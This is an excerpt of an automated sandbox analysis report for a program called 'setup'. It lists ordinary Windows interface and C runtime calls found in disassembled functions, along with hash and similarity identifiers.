                                                                                                                                                                                                                                                                          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                                                                                                          • Instruction ID: d8d84a3334a4ccce040cca9697698496fc1ac06721c4a1b1ef0d70a6b3a368e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFC1CF77C1A9F30A8775C16E555866FEEA2AFD168036BC3E08CE43F28DD6275D0492D0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 10008233
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 1000824B
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,000003E9), ref: 10008263
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000005), ref: 10008278
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000004), ref: 1000828D
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,00000003), ref: 100082A2
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000400,00000004), ref: 1000835A
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000400,00000005), ref: 100083BF
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000400,00000003), ref: 10008424
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000400,000003EC), ref: 100084C5
                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000), ref: 100084CC
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000400,000003ED), ref: 10008581
                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000), ref: 10008588
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Item$TextWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4159597273-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf9240ee546b9549e02d2ce7a970709ca3b427b08633f8d07a2583727480f05a
                                                                                                                                                                                                                                                                          • Instruction ID: d90b6b245e80e7b438b1392f255b0277f170bb1ad66301e690c0dda43a5fafcf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf9240ee546b9549e02d2ce7a970709ca3b427b08633f8d07a2583727480f05a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC19AB5504340AFEB10EF64CC89F5BB7A9FB88740F50491EF6859B281CB75E906CB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(1002DCB0,?,10017041), ref: 1001A99E
                                                                                                                                                                                                                                                                          • __mtterm.LIBCMT ref: 1001A9AA
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A682: __decode_pointer.LIBCMT ref: 1001A693
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A682: TlsFree.KERNEL32(10034274,100170DD), ref: 1001A6AD
                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32 ref: 1001AA37
                                                                                                                                                                                                                                                                          • __init_pointers.LIBCMT ref: 1001AA5C
                                                                                                                                                                                                                                                                          • __encode_pointer.LIBCMT ref: 1001AA67
                                                                                                                                                                                                                                                                          • __encode_pointer.LIBCMT ref: 1001AA77
                                                                                                                                                                                                                                                                          • __encode_pointer.LIBCMT ref: 1001AA87
                                                                                                                                                                                                                                                                          • __encode_pointer.LIBCMT ref: 1001AA97
                                                                                                                                                                                                                                                                          • __decode_pointer.LIBCMT ref: 1001AAB8
                                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 1001AAD1
                                                                                                                                                                                                                                                                          • __decode_pointer.LIBCMT ref: 1001AAEB
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1001AB01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 802150526-0
                                                                                                                                                                                                                                                                          • Opcode ID: 77bfa07764ed1b3f2209af6693d84df0119747320c378b3c2f1fa3369d1063f5
                                                                                                                                                                                                                                                                          • Instruction ID: a6f27df6961955168b74ffd5b6c6923d506fa763491db916df12e9a3f6d2876d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77bfa07764ed1b3f2209af6693d84df0119747320c378b3c2f1fa3369d1063f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2031D335914371AEEB06EF349D86A053AE6EB42396B61012BF4009E1B3DBB2DDC1CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 10018A2F
                                                                                                                                                                                                                                                                            • Part of subcall function 10019173: __calloc_impl.LIBCMT ref: 10019181
                                                                                                                                                                                                                                                                            • Part of subcall function 10019173: Sleep.KERNEL32(00000000), ref: 10019198
                                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 10018A52
                                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 10018A6E
                                                                                                                                                                                                                                                                          • __copytlocinfo_nolock.LIBCMT ref: 10018A93
                                                                                                                                                                                                                                                                          • __setlocale_nolock.LIBCMT ref: 10018AA2
                                                                                                                                                                                                                                                                          • ___removelocaleref.LIBCMT ref: 10018AAE
                                                                                                                                                                                                                                                                          • ___freetlocinfo.LIBCMT ref: 10018AB5
                                                                                                                                                                                                                                                                          • __setmbcp_nolock.LIBCMT ref: 10018ACD
                                                                                                                                                                                                                                                                          • ___removelocaleref.LIBCMT ref: 10018AE2
                                                                                                                                                                                                                                                                          • ___freetlocinfo.LIBCMT ref: 10018AE9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2969281212-0
                                                                                                                                                                                                                                                                          • Opcode ID: 67cb6fda7c273e75f5c91c709d70bf0c7129cc6810b2223e9389606dbc26ae68
                                                                                                                                                                                                                                                                          • Instruction ID: 6be3e98cece85592ac861de0b6210510e86832f343650200795cffbd614202ea
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67cb6fda7c273e75f5c91c709d70bf0c7129cc6810b2223e9389606dbc26ae68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76219279108242AFFA26DF64DC0291EBBE5EF84751F21441EF8849E162EF71EEC08752
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 1001CC75
                                                                                                                                                                                                                                                                          • __malloc_crt.LIBCMT ref: 1001CD4F
                                                                                                                                                                                                                                                                            • Part of subcall function 10019133: _malloc.LIBCMT ref: 1001913B
                                                                                                                                                                                                                                                                            • Part of subcall function 10019133: Sleep.KERNEL32(00000000,00000001,?,1001D343,00000018,10030D18,0000000C,1001D3D2,?,?,?,100233DA,00000004,10030F18,0000000C,10019186), ref: 10019150
                                                                                                                                                                                                                                                                          • __decode_pointer.LIBCMT ref: 1001CD9D
                                                                                                                                                                                                                                                                          • __decode_pointer.LIBCMT ref: 1001CDC4
                                                                                                                                                                                                                                                                          • __decode_pointer.LIBCMT ref: 1001CDE4
                                                                                                                                                                                                                                                                          • _write_multi_char.LIBCMT ref: 1001CFD7
                                                                                                                                                                                                                                                                          • _write_string.LIBCMT ref: 1001CFEB
                                                                                                                                                                                                                                                                          • _write_multi_char.LIBCMT ref: 1001D004
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __decode_pointer$_write_multi_char$Sleep__malloc_crt_malloc_strlen_write_string
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 785859804-0
                                                                                                                                                                                                                                                                          • Opcode ID: b36365ef274d595e5e009ac3952a8a936ae2a2d972d8fcd5712580348aeb0e21
                                                                                                                                                                                                                                                                          • Instruction ID: 1da8678e1d1edb4dd74044e590032a998826e6e6d125c6a2688f4f7df2886106
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b36365ef274d595e5e009ac3952a8a936ae2a2d972d8fcd5712580348aeb0e21
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10B15871C0021E9ADB11EFA4D985BEDBBF4EF08354F20402AE805BE291D775DAC5CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _write_multi_char$_write_string
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2640999400-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1211a15c03ccd78a407de36d322ff4764b6374c79448135f321bba0a2431f47f
                                                                                                                                                                                                                                                                          • Instruction ID: 658c7c3f94c38e62fce2abc14e207fbff29e5dbef90dfa3455e5b4fefe10a57e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1211a15c03ccd78a407de36d322ff4764b6374c79448135f321bba0a2431f47f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62C15871C0025E9ADB11DFA4C985BEDBBF4EB08358F20402AE905BE291D775DEC5CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 10016081
                                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 1001608D
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,`F,00000000,00000004,00000000), ref: 100160C0
                                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 100160D0
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 100160DB
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 100160F3
                                                                                                                                                                                                                                                                            • Part of subcall function 100177C4: __getptd_noexit.LIBCMT ref: 100177C4
                                                                                                                                                                                                                                                                            • Part of subcall function 1001620B: __decode_pointer.LIBCMT ref: 10016214
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                                                                                                                                                          • String ID: `F
                                                                                                                                                                                                                                                                          • API String ID: 4018905736-510860190
                                                                                                                                                                                                                                                                          • Opcode ID: e5029b0ab16c5fefcb9aa95d2cb06d6275a5c5849daf7750417263052e85ab48
                                                                                                                                                                                                                                                                          • Instruction ID: a6cc9a8803a58b07c0cdb89747a902216aba93adc943b31b7f6550f4a3dc1f1e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5029b0ab16c5fefcb9aa95d2cb06d6275a5c5849daf7750417263052e85ab48
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91113175901210BFDB21EFB48C8688FBBA8FF48374B21022AF5159F1D1DB71E9C18660
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ac8c255139e5d474570061d1aadedec86ecc02d3efda8078ce6c254de5850919
                                                                                                                                                                                                                                                                          • Instruction ID: 074fed0a38aff72566bbe03f2808f0e4e80eeb84b875cca63601fdc777343f46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac8c255139e5d474570061d1aadedec86ecc02d3efda8078ce6c254de5850919
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA16971C0025E9ADB11EFA4D984BEDBBF4EF08354F20402AE805BE191D775DAC6DB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d521a94620a0ed89f8b87df2878b76e61da765f1dab21d671b29ec244e41150c
                                                                                                                                                                                                                                                                          • Instruction ID: b7c35f3b66037c805eb5449063391554bce262784df755f4fad8970b0abf8de0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d521a94620a0ed89f8b87df2878b76e61da765f1dab21d671b29ec244e41150c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A15871C0021E9ADB11EFA8D984BEDBBF4EF08354F20402AE805BE291D775DAC5DB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __decode_pointer$_write_multi_char$_strlen_write_string
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4088299054-0
                                                                                                                                                                                                                                                                          • Opcode ID: 476dfb1d33abe52d8b62a583c15a02e3f0764789bb2d6fe9871f939d93c3d602
                                                                                                                                                                                                                                                                          • Instruction ID: c2b070dd03d82076a5df1495e61f3aa54dab514c14bbc563e68e0c9d8bdd64a3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476dfb1d33abe52d8b62a583c15a02e3f0764789bb2d6fe9871f939d93c3d602
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA16871C0021E9ADF11EFA4D984BEDBBF4EB08358F20402AE805BE191D775DAC5DBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetDC.USER32 ref: 10011642
                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000), ref: 10011685
                                                                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(00000000,?,?,?), ref: 100116BE
                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(0000000F,00000000), ref: 100116C6
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(0000000F,1003424C), ref: 100116D2
                                                                                                                                                                                                                                                                          • GetParent.USER32(0000000F), ref: 100116E0
                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,?), ref: 100116E9
                                                                                                                                                                                                                                                                          • MoveWindow.USER32(0000000F,?,0000000F,?,?,00000000,?,?,1002FD60,00000009), ref: 1001170A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$ExtentMoveObjectParentPoint32PointsRectReleaseSelectText
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2456833781-0
                                                                                                                                                                                                                                                                          • Opcode ID: b58fe5e0255bbc3348541ca4579eccea998ed2d1821441d5288f18be9d2b23ea
                                                                                                                                                                                                                                                                          • Instruction ID: 365b987599f97103a401181fa88c4ba4a201618a1f30d8a86e763ed73dc29309
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b58fe5e0255bbc3348541ca4579eccea998ed2d1821441d5288f18be9d2b23ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59313AB5108340AFE304DF54CC89F6BBBF9EB89701F00491DF69686290DB75E949CB62
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,0000000A,1002FD3C,0000000A,?,?,?,?,?,?,?,?,0000000A), ref: 100120F5
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?), ref: 100121D5
                                                                                                                                                                                                                                                                            • Part of subcall function 10005580: _memcpy_s.LIBCMT ref: 10005621
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 1001211B
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,0000000A,1002FD7C,0000000C,0000000A,1002FD7C,0000000C,0000000A,1002FD30,0000000A), ref: 10012296
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100122BC
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?), ref: 10012376
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040A,00000000,00000000), ref: 100123D4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Enable$Show$MessageSend_memcpy_s
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 319832689-0
                                                                                                                                                                                                                                                                          • Opcode ID: 05db17c30aaa694011525a0944a1fa5599d3b02f0a5888503c3f01cc32dbcae2
                                                                                                                                                                                                                                                                          • Instruction ID: 70297975ae46391a4611124d9420377f8ef106a5a04cd59ae07ca0002d42610a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05db17c30aaa694011525a0944a1fa5599d3b02f0a5888503c3f01cc32dbcae2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B166B0508381AFD300DF64C894A5BBBE5EF98744F404A1DF1A54B291DBB5E989CF63
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ____lc_handle_func.LIBCMT ref: 10015AD4
                                                                                                                                                                                                                                                                          • ____lc_codepage_func.LIBCMT ref: 10015ADC
                                                                                                                                                                                                                                                                          • __GetLocaleForCP.LIBCPMT ref: 10015B05
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000), ref: 10015B3A
                                                                                                                                                                                                                                                                          • ___pctype_func.LIBCMT ref: 10015B6D
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,00000000), ref: 10015BD0
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 10015C01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 291276006-0
                                                                                                                                                                                                                                                                          • Opcode ID: f7666b4b8f5f8476db1ac35d0d639a4e25868a1555b767a2da24d8a53b4be136
                                                                                                                                                                                                                                                                          • Instruction ID: 95aa83d7133822fa35f213ed1bb5801f1d9836910d5fe9e55b547dc0f0a07bd0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7666b4b8f5f8476db1ac35d0d639a4e25868a1555b767a2da24d8a53b4be136
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17418271108246EEDB21CF20C8C1B5A3BE8FF013A2F2D851AF8548E191E772E9D0DB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,0000000A,1002FD3C,0000000A,?,?,?,?,?,?,?,?,0000000A), ref: 10011D74
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 10011E4D
                                                                                                                                                                                                                                                                            • Part of subcall function 10005580: _memcpy_s.LIBCMT ref: 10005621
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 10011D99
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,0000000A,1002FD7C,0000000C,0000000A,1002FD7C,0000000C,0000000A,1002FD30,0000000A), ref: 10011F0D
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 10011F32
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 10011FE6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Enable$Show$_memcpy_s
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3980216484-0
                                                                                                                                                                                                                                                                          • Opcode ID: 341bb5b0baf654347adb56bf7cf638f68406970b44fbdb8cc61e519d0c3d8b05
                                                                                                                                                                                                                                                                          • Instruction ID: cf9ef89f6dd81f9a3b295782e13c24bbb108f5d2743206de0f94cdbe79c2d839
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 341bb5b0baf654347adb56bf7cf638f68406970b44fbdb8cc61e519d0c3d8b05
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03A169B0508381AFD304DF58D894A5BBBE9EF88344F404A2DF1A54B291DBB5E949CF93
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 100115A4
                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 100115BA
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040A,00000001,0000001E), ref: 100115CA
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040A,00000000,00000000), ref: 100115DE
                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 100115EB
                                                                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000301), ref: 100115FB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Long$MessageSend$Redraw
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3943020483-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e0fa1797f8b33799c87c708e47c8f07552f8a8d4d201ec70065628c619f56ca
                                                                                                                                                                                                                                                                          • Instruction ID: 12809ebe4bb4be9faaa38a2f221fea71315ac69183fc6af444e071afd0e820f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e0fa1797f8b33799c87c708e47c8f07552f8a8d4d201ec70065628c619f56ca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF0A77158823076F62163105CCEFEB2D259B56F73F314206F715784E0CBE418539269
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 1000F03B
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 1000F061
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1000F0F5
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 1000F10A
                                                                                                                                                                                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 1000F127
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LockitLockit::_std::_$Exception@8RegisterThrowstd::locale::facet::facet_
                                                                                                                                                                                                                                                                          • String ID:
